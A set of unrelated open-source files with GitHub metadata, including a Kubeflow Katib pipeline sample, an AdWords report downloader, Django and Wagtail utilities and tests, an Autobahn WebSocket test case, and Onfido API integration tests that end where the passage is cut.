"bytes": "79926"
},
{
"name": "Shell",
"bytes": "41"
}
],
"symlink_target": ""
}
|
import json
from kfp import components
import kfp.dsl as dsl
@dsl.pipeline(
name="Launch katib experiment",
description="An example to launch katib experiment."
)
def mnist_hpo(
name="mnist",
namespace="kubeflow",
goal=0.99,
parallelTrialCount=3,
maxTrialCount=12,
experimentTimeoutMinutes=60,
deleteAfterDone=True):
objectiveConfig = {
"type": "maximize",
"goal": goal,
"objectiveMetricName": "Validation-accuracy",
"additionalMetricNames": ["accuracy"]
}
algorithmConfig = {"algorithmName" : "random"}
parameters = [
{"name": "--lr", "parameterType": "double", "feasibleSpace": {"min": "0.01","max": "0.03"}},
{"name": "--num-layers", "parameterType": "int", "feasibleSpace": {"min": "2", "max": "5"}},
{"name": "--optimizer", "parameterType": "categorical", "feasibleSpace": {"list": ["sgd", "adam", "ftrl"]}}
]
rawTemplate = {
"apiVersion": "batch/v1",
"kind": "Job",
"metadata": {
"name": "{{.Trial}}",
"namespace": "{{.NameSpace}}"
},
"spec": {
"template": {
"spec": {
"restartPolicy": "Never",
"containers": [
{"name": "{{.Trial}}",
"image": "docker.io/katib/mxnet-mnist-example",
"command": [
"python /mxnet/example/image-classification/train_mnist.py --batch-size=64 {{- with .HyperParameters}} {{- range .}} {{.Name}}={{.Value}} {{- end}} {{- end}}"
]
}
]
}
}
}
}
trialTemplate = {
"goTemplate": {
"rawTemplate": json.dumps(rawTemplate)
}
}
katib_experiment_launcher_op = components.load_component_from_file("./component.yaml")
# katib_experiment_launcher_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/master/components/kubeflow/katib-launcher/component.yaml')
op1 = katib_experiment_launcher_op(
experiment_name=name,
experiment_namespace=namespace,
parallel_trial_count=parallelTrialCount,
max_trial_count=maxTrialCount,
objective=str(objectiveConfig),
algorithm=str(algorithmConfig),
trial_template=str(trialTemplate),
parameters=str(parameters),
experiment_timeout_minutes=experimentTimeoutMinutes,
delete_finished_experiment=deleteAfterDone)
op_out = dsl.ContainerOp(
name="my-out-cop",
image="library/bash:4.4.23",
command=["sh", "-c"],
arguments=["echo hyperparameter: %s" % op1.output],
)
if __name__ == "__main__":
import kfp.compiler as compiler
compiler.Compiler().compile(mnist_hpo, __file__ + ".tar.gz")
|
{
"content_hash": "725db2d5aacec42b9caa71cb3e90bece",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 184,
"avg_line_length": 35.475,
"alnum_prop": 0.5648343904157858,
"repo_name": "kubeflow/kfp-tekton-backend",
"id": "67b79890a0e3ab688214e3974c53ca15d6dc7130",
"size": "2838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "components/kubeflow/katib-launcher/sample2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "47293"
},
{
"name": "Go",
"bytes": "1269081"
},
{
"name": "HTML",
"bytes": "3584"
},
{
"name": "JavaScript",
"bytes": "24828"
},
{
"name": "Jupyter Notebook",
"bytes": "177616"
},
{
"name": "Makefile",
"bytes": "9694"
},
{
"name": "PowerShell",
"bytes": "3194"
},
{
"name": "Python",
"bytes": "1628570"
},
{
"name": "Scala",
"bytes": "13000"
},
{
"name": "Shell",
"bytes": "180020"
},
{
"name": "Smarty",
"bytes": "7694"
},
{
"name": "Starlark",
"bytes": "76037"
},
{
"name": "TypeScript",
"bytes": "1641150"
}
],
"symlink_target": ""
}
|
"""Utility functions for working with reports."""
__author__ = 'api.kwinter@gmail.com (Kevin Winter)'
import datetime
import gzip
import re
import StringIO
import time
import urllib
import urllib2
from adspygoogle import SOAPpy
from adspygoogle.adwords import AUTH_TOKEN_EXPIRE
from adspygoogle.adwords import AUTH_TOKEN_SERVICE
from adspygoogle.adwords import LIB_SIG
from adspygoogle.adwords.AdWordsErrors import AdWordsError
from adspygoogle.adwords.AdWordsErrors import AdWordsReportError
from adspygoogle.adwords.util import XsdToWsdl
from adspygoogle.common import MessageHandler
from adspygoogle.common import SanityCheck
from adspygoogle.common import Utils
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.Logger import Logger
SERVICE_NAME = 'ReportDefinitionService'
DOWNLOAD_URL_BASE = '/api/adwords/reportdownload'
REPORT_ID='?__rd=%s'
VERSIONED='/%s'
ATTRIBUTES_REGEX = r'( )?[\w:-]+="[\w:\[\]-]+"'
ERROR_TYPE_REGEX = r'(?s)<type>(.*?)</type>'
ERROR_TRIGGER_REGEX = r'(?s)<trigger>(.*?)</trigger>'
ERROR_FIELD_PATH_REGEX = r'(?s)<fieldPath>(.*?)</fieldPath>'
BUF_SIZE = 4096
# We will refresh an OAuth 2.0 credential _OAUTH2_REFRESH_MINUTES_IN_ADVANCE
# minutes in advance of it's expiration.
_OAUTH2_REFRESH_MINUTES_IN_ADVANCE = 5
class ReportDownloader(object):
"""Utility class that downloads reports."""
def __init__(self, headers, config, op_config, logger):
"""Inits ReportDownloader.
Args:
headers: dict Dictionary object with populated authentication
credentials.
config: dict Dictionary object with populated configuration values.
op_config: dict Dictionary object with additional configuration values for
this operation.
"""
self._headers = headers
self._config = config
self._op_config = op_config
self._message_handler = MessageHandler
namespace_suffix = '/'.join(('/api/adwords', op_config['group'],
self._op_config['version']))
self._namespace = 'https://adwords.google.com' + namespace_suffix
xsd_url = '%s%s%s/reportDefinition.xsd' % (op_config['server'],
'/api/adwords/reportdownload/',
self._op_config['version'])
self._soappyservice = XsdToWsdl.CreateWsdlFromXsdUrl(xsd_url)
self._logger = logger
def DownloadReport(self, report_definition_or_id, return_micros=False,
file_path=None, fileobj=None):
"""Downloads a report by object or id.
Args:
report_definition_or_id: dict or str Report or reportDefinitionId.
return_micros: bool Whether to return currency in micros (optional).
file_path: str File path to download to (optional).
fileobj: file An already-open file-like object that supports write()
(optional).
Returns:
str Report data if file_path and fileobj are None, None if fileobj is
not None and file_path otherwise.
"""
if not fileobj and file_path:
fileobj = open(file_path, 'w+')
if isinstance(report_definition_or_id, dict):
return self.__DownloadAdHocReport(report_definition_or_id, return_micros,
fileobj) or file_path
else:
return self.__DownloadReportById(report_definition_or_id, return_micros,
fileobj) or file_path
def DownloadReportWithAwql(self, report_query, download_format,
return_micros=False, file_path=None, fileobj=None):
"""Downloads a report with AWQL.
Args:
report_query: str AWQL for the report.
download_format: str Download format. E.g. CSV, TSV, XML.
return_micros: bool Whether to return currency in micros (optional).
file_path: str File path to download to (optional).
fileobj: file An already-open file-like object that supports write()
(optional).
Returns:
str Report data if file_path and fileobj are None, None if fileobj is
not None and file_path otherwise.
"""
if not fileobj and file_path:
fileobj = open(file_path, 'w+')
return self.__DownloadAdHocReportWithAwql(report_query,
download_format,
return_micros,
fileobj) or file_path
def __DownloadAdHocReport(self, report_definition, return_micros=False,
fileobj=None):
"""Downloads an AdHoc report.
Args:
report_definition: dict Report to download.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
report_xml = self.__GetReportXml(report_definition)
query_params = {'__rdxml': report_xml}
payload = urllib.urlencode(query_params)
return self.__DownloadReport(payload, return_micros, fileobj)
def __DownloadAdHocReportWithAwql(self,
report_query,
download_format,
return_micros=False,
fileobj=None):
"""Downloads an AdHoc report with AWQL.
Args:
report_query: str AWQL to download a report for.
download_format: str Format of the report download.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
query_params = {
'__fmt': download_format,
'__rdquery': report_query
}
payload = urllib.urlencode(query_params)
return self.__DownloadReport(payload, return_micros, fileobj)
def __DownloadReport(self, report_payload, return_micros=False, fileobj=None):
"""Downloads an AdHoc report for the specified payload.
Args:
report_payload: str Report payload to POST to the server.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
url = self.__GenerateUrl()
self._CheckAuthentication()
headers = self.__GenerateHeaders(return_micros)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['Content-Length'] = str(len(report_payload))
return self.__MakeRequest(url, headers, fileobj, payload=report_payload)
def __GetReportXml(self, report):
"""Transforms the report object into xml.
Args:
report: dict ReportDefinition object to turn to xml.
Returns:
str ReportDefinition XML.
"""
SanityCheck.SoappySanityCheck(self._soappyservice, report, self._namespace,
u'reportDefinition')
packed = self._message_handler.PackForSoappy(report, self._namespace,
'reportDefinition',
self._soappyservice, False,
lambda x: '')
# Use a SOAPBuilder
builder = SOAPpy.SOAPBuilder(kw={'reportDefinition': packed}, envelope=0,
noroot=1)
# Fixes list serialization.
builder.config.typed = False
# Hack, need to remove top element and body wrapper.
builder._xml_top = ''
builder.body = 0
# Build the XML.
report_xml = builder.build()
# Removes xsi:types.
report_xml = self.__RemoveAttributes(report_xml)
return report_xml
def __RemoveAttributes(self, report_xml):
"""Removes all attributes from tags.
Args:
report_xml: str xml to remove attributes from.
Returns:
str Report xml with attributes removed.
"""
return re.sub(ATTRIBUTES_REGEX, '', report_xml).strip()
def __DownloadReportById(self, report_definition_id, return_micros=False,
fileobj=None):
"""Download report and return raw data.
Args:
report_definition_id: str Id of the report definition to download.
return_micros: bool Whether to return currency in micros.
fileobj: str Path to download file to.
Returns:
str Report data if no fileobj, otherwise None.
"""
self._CheckAuthentication()
url = self.__GenerateUrl(report_definition_id)
headers = self.__GenerateHeaders(return_micros)
return self.__MakeRequest(url, headers, fileobj)
def __GenerateUrl(self, report_definition_id=None):
"""Generates the URL to get a report from.
Args:
report_definition_id: int ID of the report to download.
Returns:
str url to request
"""
url = [DOWNLOAD_URL_BASE]
url.append(VERSIONED % self._op_config['version'])
if report_definition_id:
url.append(REPORT_ID % report_definition_id)
return ''.join(url)
def __GenerateHeaders(self, return_micros):
"""Generates the headers to use for the report download.
Args:
return_micros: bool whether or not to use micros for money.
Returns:
dict Dictionary containing all the headers for the request
"""
headers = {}
if 'clientCustomerId' in self._headers:
headers['clientCustomerId'] = self._headers['clientCustomerId']
# Handle OAuth (if enabled) and ClientLogin
if self._headers.get('oauth2credentials'):
self._headers['oauth2credentials'].apply(headers)
else:
headers['Authorization'] = ('GoogleLogin %s' %
urllib.urlencode({'auth':
self._headers['authToken'].strip()}))
headers['returnMoneyInMicros'] = str(return_micros).lower()
headers['developerToken'] = self._headers['developerToken']
headers['User-Agent'] = self._headers['userAgent']
if Utils.BoolTypeConvert(self._config['compress']):
headers['Accept-Encoding'] = 'gzip'
headers['User-Agent'] += ',gzip'
headers['Content-Encoding'] = 'gzip'
return headers
def __MakeRequest(self, url, headers=None, fileobj=None, payload=None):
"""Performs an HTTPS request and slightly processes the response.
If fileobj is provided, saves the body to file instead of including it
in the return value.
Args:
url: str Resource for the request line.
headers: dict Headers to send along with the request.
fileobj: file File to save to (optional).
payload: str Xml to POST (optional).
Returns:
str Report data as a string if fileobj=None, otherwise None
"""
headers = headers or {}
request_url = self._op_config['server'] + url
orig_payload = payload
if Utils.BoolTypeConvert(self._config['compress']):
buffer = StringIO.StringIO()
gzip_file = gzip.GzipFile(mode='wb', fileobj=buffer)
gzip_file.write(payload)
gzip_file.close()
payload = buffer.getvalue()
headers['Content-Length'] = str(len(payload))
start_time = time.strftime('%Y-%m-%d %H:%M:%S')
request = urllib2.Request(request_url, payload, headers)
try:
response_code = '---'
response_headers = []
try:
response = urllib2.urlopen(request)
response_code = response.code
response_headers = response.info().headers
if response.info().get('Content-Encoding') == 'gzip':
response = gzip.GzipFile(fileobj=StringIO.StringIO(response.read()),
mode='rb')
if fileobj:
self.__DumpToFile(response, fileobj)
return None
else:
return response.read()
except urllib2.HTTPError, e:
response = e
response_code = response.code
response_headers = response.info().headers
if response.info().get('Content-Encoding') == 'gzip':
response = gzip.GzipFile(fileobj=StringIO.StringIO(response.read()),
mode='rb')
error = response.read()
self.__CheckForXmlError(response_code, error)
raise AdWordsError('%s %s' % (str(e), error))
except urllib2.URLError, e:
raise AdWordsError(str(e))
finally:
end_time = time.strftime('%Y-%m-%d %H:%M:%S')
xml_log_data = self.__CreateXmlLogData(start_time, end_time, request_url,
headers, orig_payload,
response_code, response_headers)
self.__LogRequest(xml_log_data)
def __CheckForXmlError(self, response_code, response):
if 'reportDownloadError' in response:
error_type = re.search(ERROR_TYPE_REGEX, response)
if error_type: error_type = error_type.group(1)
trigger = re.search(ERROR_TRIGGER_REGEX, response)
if trigger: trigger = trigger.group(1)
field_path = re.search(ERROR_FIELD_PATH_REGEX, response)
if field_path: field_path = field_path.group(1)
raise AdWordsReportError(response_code, error_type, trigger, field_path)
def _CheckAuthentication(self):
"""Ensures we have authentication values ready to make the request."""
if self._headers.get('oauth2credentials'):
self._RefreshCredentialIfNecessary(self._headers['oauth2credentials'])
else:
self.__ReloadAuthToken()
def _RefreshCredentialIfNecessary(self, credential):
"""Checks if the credential needs refreshing and refreshes if necessary."""
if (credential.token_expiry is not None and credential.token_expiry -
datetime.datetime.utcnow() <
datetime.timedelta(minutes=_OAUTH2_REFRESH_MINUTES_IN_ADVANCE)):
import httplib2
self._headers['oauth2credentials'].refresh(httplib2.Http())
def __ReloadAuthToken(self):
"""Ensures we have a valid auth_token in our headers."""
# Load/set authentication token. If authentication token has expired,
# regenerate it.
now = time.time()
if (('authToken' not in self._headers and
'auth_token_epoch' not in self._config) or
int(now - self._config['auth_token_epoch']) >= AUTH_TOKEN_EXPIRE):
if ('email' not in self._headers or
not self._headers['email'] or
'password' not in self._headers or
not self._headers['password']):
msg = ('Required authentication headers, \'email\' and \'password\', '
'are missing. Unable to regenerate authentication token.')
raise ValidationError(msg)
self._headers['authToken'] = Utils.GetAuthToken(
self._headers['email'], self._headers['password'],
AUTH_TOKEN_SERVICE, LIB_SIG, self._config['proxy'])
self._config['auth_token_epoch'] = time.time()
def __DumpToFile(self, response, fileobj):
"""Reads from response.read() and writes to fileobj.
Args:
response: file Some object that supports read().
fileobj: file Some object that supports write()
Returns:
number Number of bytes written.
"""
byteswritten = 0
while True:
buf = response.read(BUF_SIZE)
if buf:
fileobj.write(buf)
byteswritten += len(buf)
else:
break
return byteswritten
def __LogRequest(self, xml_log_data):
"""Logs the Report Download request.
Args:
xml_log_data: str Data to log for this request.
"""
log_handlers = self.__GetLogHandlers()
for handler in log_handlers:
handler['target'] = Logger.NONE
if handler['tag'] == 'xml_log':
handler['data'] += xml_log_data
for handler in log_handlers:
if (handler['tag'] and
Utils.BoolTypeConvert(self._config[handler['tag']])):
handler['target'] = Logger.FILE
# If debugging is On, raise handler's target two levels,
# NONE -> CONSOLE
# FILE -> FILE_AND_CONSOLE.
if Utils.BoolTypeConvert(self._config['debug']):
handler['target'] += 2
if (handler['target'] != Logger.NONE and handler['data'] and
handler['data'] != 'None' and handler['data'] != 'DEBUG: '):
self._logger.Log(handler['name'], handler['data'],
log_level=Logger.DEBUG, log_handler=handler['target'])
def __GetLogHandlers(self):
"""Gets a list of log handlers for the AdWords library.
Returns:
list Log handlers for the AdWords library.
"""
return [
{
'tag': 'xml_log',
'name': 'soap_xml',
'data': ''
},
{
'tag': 'request_log',
'name': 'request_info',
'data': ('host=%s operation=%s'
% (self._op_config['server'], 'ReportDownload'))
}
]
def __CreateXmlLogData(self, start_time, end_time, request_url,
request_headers, payload, response_code,
response_headers):
"""Transforms arguments into a string to log.
Args:
start_time: str Formatted start time.
end_time: str Formatted end time.
request_url: str URL POSTed to.
request_headers: dict Request headers sent with request.
payload: str Payload (http request body).
response_code: int Response code from remote server.
response_headers: list List of string headers received.
Returns:
str Data to log.
"""
# Errors will have a response code, otherwise it should have been success.
response_code = response_code or 200
return ('StartTime: %s\n%s\n%s\n\n%s\n\n%s\n%s\nEndTime: %s'
% (start_time, 'POST: %s' % request_url,
self.__SerializeRequestHeaders(request_headers), payload,
'HTTP %s' % response_code,
self.__SerializeResponseHeaders(response_headers), end_time))
def __SerializeRequestHeaders(self, request_headers):
"""Serializes the request headers into a string for logging.
Returns each key->value pair as "key: value" with newlines separating them.
Args:
request_headers: dict Dictionary of headers to serialize.
Returns:
str Serialized request headers.
"""
return '\n'.join(['%s: %s' % (key, request_headers[key])
for key in request_headers])
def __SerializeResponseHeaders(self, response_headers):
"""Serializes the response headers.
Headers are already formatted, this joins them into a single string.
Args:
response_headers: list List of string headers received.
Returns:
str Serialized response headers.
"""
return (''.join(response_headers)).strip()
|
{
"content_hash": "dac267d9d3a3ffa5af2b96c989d6e2c6",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 80,
"avg_line_length": 36.48235294117647,
"alnum_prop": 0.6260346124905944,
"repo_name": "caioserra/apiAdwords",
"id": "6933382501ce4937233c013f4669371176f33287",
"size": "19224",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "adspygoogle/adwords/ReportDownloader.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "47375"
},
{
"name": "Python",
"bytes": "3481410"
},
{
"name": "Shell",
"bytes": "14782"
}
],
"symlink_target": ""
}
|
import httplib2
from googleapiclient import discovery
from spuc import utils
def create_user(user_config, service_config):
user_config = \
utils.convert_config_file(user_config)['gapps']
service_config = \
utils.convert_config_file(service_config)['gapps']
credentials = utils.get_oauth_credentials(
credential_config_dict=service_config,
scopes=utils.GOOGLE_SCOPES,
name_prefix='google'
)
http = credentials.authorize(httplib2.Http())
service = discovery.build('admin', 'directory_v1', http=http)
result = service.users().insert(body=user_config).execute()
return result
|
{
"content_hash": "8b10a72d8170cc143bd6f5f70f011d6f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 65,
"avg_line_length": 28.782608695652176,
"alnum_prop": 0.676737160120846,
"repo_name": "davidginzbourg/spuc",
"id": "ee9e7d9a6966d86d2d1d972b07493a6cebcd611c",
"size": "662",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spuc/services/gapps_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "800"
},
{
"name": "Python",
"bytes": "10619"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import os
import sys
from django.conf import settings
# Corrects some pathing issues in various contexts, such as cron jobs,
# and the project layout still being in Django 1.3 format.
sys.path.append(os.path.abspath(os.path.join(settings.PROJECT_ROOT, "..")))
# Add the site ID CLI arg to the environment, which allows for the site
# used in any site related queries to be manually set for management
# commands.
for i, arg in enumerate(sys.argv):
if arg.startswith("--site"):
os.environ["MEZZANINE_SITE_ID"] = arg.split("=")[1]
sys.argv.pop(i)
# Run Django.
if __name__ == "__main__":
settings_module = "%s.settings" % settings.PROJECT_DIRNAME
os.environ.setdefault("DJANGO_SETTINGS_MODULE", settings_module)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "102f6b9bf8b3d92204113df00e32d5b7",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 75,
"avg_line_length": 33.55555555555556,
"alnum_prop": 0.717439293598234,
"repo_name": "mauriziobit/cookiecutter-mezzanine",
"id": "4158e07eec807fd6000f85a134c5a2f56a97d320",
"size": "928",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{cookiecutter.project_name}}/project/manage.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "25491"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import unittest
import django
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.test import TestCase
from wagtail.wagtailcore.models import Page, PAGE_TEMPLATE_VAR, Site
@unittest.skipIf(django.VERSION < (1, 8), 'Multiple engines only supported in Django>=1.8')
class TestCoreJinja(TestCase):
def setUp(self):
# This does not exist on Django<1.8
from django.template import engines
self.engine = engines['jinja2']
self.user = get_user_model().objects.create_superuser(username='test', email='test@email.com', password='password')
self.homepage = Page.objects.get(id=2)
def render(self, string, context=None, request_context=True):
if context is None:
context = {}
template = self.engine.from_string(string)
return template.render(context)
def dummy_request(self, user=None):
site = Site.objects.get(is_default_site=True)
request = self.client.get('/')
request.site = site
request.user = user or AnonymousUser()
return request
def test_userbar(self):
content = self.render('{{ wagtailuserbar() }}', {
PAGE_TEMPLATE_VAR: self.homepage,
'request': self.dummy_request(self.user)})
self.assertIn("<!-- Wagtail user bar embed code -->", content)
def test_userbar_anonymous_user(self):
content = self.render('{{ wagtailuserbar() }}', {
PAGE_TEMPLATE_VAR: self.homepage,
'request': self.dummy_request()})
# Make sure nothing was rendered
self.assertEqual(content, '')
|
{
"content_hash": "fe08c31aa67c2e68d90d9df0588fda5b",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 123,
"avg_line_length": 33.03846153846154,
"alnum_prop": 0.6530849825378346,
"repo_name": "hanpama/wagtail",
"id": "b5392615997a552b1be832c3820753034d54eb35",
"size": "1718",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "wagtail/wagtailadmin/tests/test_jinja2.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "152699"
},
{
"name": "HTML",
"bytes": "251513"
},
{
"name": "JavaScript",
"bytes": "92646"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "1615982"
},
{
"name": "Shell",
"bytes": "7241"
}
],
"symlink_target": ""
}
|
"""
Global configuration for Code TA
"""
|
{
"content_hash": "fd99b472a62d915b918b34a30f035645",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 15,
"alnum_prop": 0.6222222222222222,
"repo_name": "smarie5/codeta",
"id": "b38687e63254c1ddd6b13117a9c365e9b61b8dc3",
"size": "45",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "codeta/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2368"
},
{
"name": "JavaScript",
"bytes": "0"
},
{
"name": "Puppet",
"bytes": "123217"
},
{
"name": "Python",
"bytes": "12643"
},
{
"name": "Ruby",
"bytes": "640691"
},
{
"name": "Shell",
"bytes": "7340"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('django_tasker', '0005_auto_20170107_2302'),
]
operations = [
migrations.AlterIndexTogether(
name='taskinfo',
index_together=set([('id', 'eta', 'status'), ('id', 'target'), ('target', 'eta'), ('id', 'target', 'status', 'eta'), ('target', 'status')]),
),
]
|
{
"content_hash": "a215fa01fdb28dccda0f2de3915bcc9a",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 152,
"avg_line_length": 26.764705882352942,
"alnum_prop": 0.5692307692307692,
"repo_name": "wooyek/django-tasker",
"id": "071472a6ad42f636890dd1b7fadfc41ae82008ee",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "django_tasker/migrations/0006_auto_20170120_1122.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69412"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
def fail():
c1()
def c1():
c2()
def c2():
import exception
fail()
|
{
"content_hash": "cef0451ac65a2626f9549f47d18283e4",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 38,
"avg_line_length": 7.8125,
"alnum_prop": 0.56,
"repo_name": "guildai/guild",
"id": "9ce12e67055709b896a648b97b20927060b899f1",
"size": "125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "guild/tests/samples/projects/errors/stack.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "416"
},
{
"name": "JavaScript",
"bytes": "29682"
},
{
"name": "Makefile",
"bytes": "2621"
},
{
"name": "Python",
"bytes": "736181"
},
{
"name": "Shell",
"bytes": "1074"
},
{
"name": "Vue",
"bytes": "48469"
}
],
"symlink_target": ""
}
|
if __name__ == '__main__':
import unittest
import os
def load_tests(loader, tests, pattern):
tests_dir = os.path.dirname(__file__)
tests.addTests(loader.discover(start_dir=tests_dir, pattern=pattern or 'test*.py'))
return tests
unittest.main()
|
{
"content_hash": "944dc4e606890028f10818e890a83ee0",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 91,
"avg_line_length": 28.6,
"alnum_prop": 0.6118881118881119,
"repo_name": "sissaschool/elementpath",
"id": "29fb20ed1e69cde74d70af280582ff2c0fe53b2f",
"size": "1114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_elementpath.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1405428"
}
],
"symlink_target": ""
}
|
"""
WSGI config for about_tmpl project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "about_tmpl.settings")
application = get_wsgi_application()
|
{
"content_hash": "6989a1af49bfaafb9e384100db50e2db",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.875,
"alnum_prop": 0.7688442211055276,
"repo_name": "JuneDeng2014/working_notes",
"id": "afb133c44ccdd77d9ab1c361120ba63f07537a8f",
"size": "398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "learn-django-by-example/about_tmpl/about_tmpl/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24"
},
{
"name": "GCC Machine Description",
"bytes": "4127"
},
{
"name": "HTML",
"bytes": "21668"
},
{
"name": "JavaScript",
"bytes": "631913"
},
{
"name": "Python",
"bytes": "72424"
}
],
"symlink_target": ""
}
|
from case import Case
class Case4_2_3(Case):
DESCRIPTION = """Send small text message, then send frame with reserved control <b>Opcode = 13</b>, then send Ping."""
EXPECTATION = """Echo for first message is received, but then connection is failed immediately, since reserved opcode frame is used. A Pong is not received."""
def onOpen(self):
payload = "Hello, world!"
self.expected[Case.OK] = [("message", payload, False)]
self.expected[Case.NON_STRICT] = []
self.expectedClose = {"closedByMe":False,"closeCode":[self.p.CLOSE_STATUS_CODE_PROTOCOL_ERROR],"requireClean":False}
self.p.sendFrame(opcode = 1, payload = payload)
self.p.sendFrame(opcode = 13)
self.p.sendFrame(opcode = 9)
self.p.killAfter(1)
|
{
"content_hash": "d3759c373ac8e8aafdde466d6c5eaa53",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 162,
"avg_line_length": 43.5,
"alnum_prop": 0.6628352490421456,
"repo_name": "crossbario/autobahn-testsuite",
"id": "66bed28e51f54cff01f8087939d6ac94da970fb5",
"size": "1581",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "autobahntestsuite/autobahntestsuite/case/case4_2_3.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1585"
},
{
"name": "Dockerfile",
"bytes": "1320"
},
{
"name": "HTML",
"bytes": "52193"
},
{
"name": "JavaScript",
"bytes": "6502"
},
{
"name": "Makefile",
"bytes": "3646"
},
{
"name": "Python",
"bytes": "515213"
},
{
"name": "Shell",
"bytes": "606"
}
],
"symlink_target": ""
}
|
from onfido import Api
from .test_data import * # flake8: noqa
import unittest2
import os
import time
import random
class IntegrationTest(unittest2.TestCase):
def create_api(self):
# suitable obtuse enough env variable that it won't be set already
api_token = os.environ['ONFIDO_INTEGRATION_TEST_API_TOKEN']
return Api(api_token)
def create_input_applicant(self):
timestamp = str(int(time.time()))
input_applicant = test_applicant
input_applicant["last_name"] = timestamp
input_applicant["email"] = "{0}@example.com".format(timestamp)
return input_applicant
def test_integration_applicant(self):
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
onfido_created_fields = [ "id", "href", "created_at" ]
for onfido_field in onfido_created_fields:
self.assertTrue(onfido_field in created_applicant)
for input_field in input_applicant.keys():
self.assertTrue(input_field in created_applicant)
retrieved_applicant = api.Applicants.find(created_applicant["id"])
for field in retrieved_applicant.keys():
self.assertEqual(retrieved_applicant[field],
created_applicant[field])
all_applicants = api.Applicants.all()
found_applicant = False
for applicant in all_applicants["applicants"]:
if applicant["id"] == created_applicant["id"]:
found_applicant = True
self.assertTrue(found_applicant)
def test_integration_document(self):
api = self.create_api()
applicant = random.choice(api.Applicants.all()["applicants"])
document = open("onfido/test/passport.png", "rb")
doc_response = api.Documents.create(applicant["id"], document, "passport.png", "passport")
self.assertIn("id", doc_response)
def test_integration_live_photo(self):
api = self.create_api()
applicant = api.Applicants.all()["applicants"][0]
live_photo = open("onfido/test/passport.png", "rb")
response = api.LivePhotos.create(applicant["id"], live_photo,
'passport.png')
self.assertIn("id", response)
def test_integration_check(self):
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
check_details = {
"type": 'standard',
"reports": [{ "name": 'identity' }]
}
created_check = api.Checks.create(created_applicant["id"], check_details)
self.assertIn("id", created_check)
retrieved_check = api.Checks.find(created_applicant["id"], created_check["id"])
for field in retrieved_check.keys():
if field not in [ "reports" ]: # different value returned when creating vs returning :-S
self.assertEqual(retrieved_check[field],
created_check[field])
all_checks = api.Checks.all(created_applicant["id"])
found_check = False
for check in all_checks["checks"]:
if check["id"] == created_check["id"]:
found_check = True
self.assertTrue(found_check)
def test_integration_report(self):
# setup a new applicant + check
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
check_details = {
"type": 'standard',
"reports": [{ "name": 'identity' }]
}
created_check = api.Checks.create(created_applicant["id"], check_details)
report_id = created_check["reports"][0]["id"]
report = api.Reports.find(created_check["id"], report_id)
self.assertIn("id", report)
all_reports = api.Reports.all(created_check["id"])
report_found = False
for report in all_reports["reports"]:
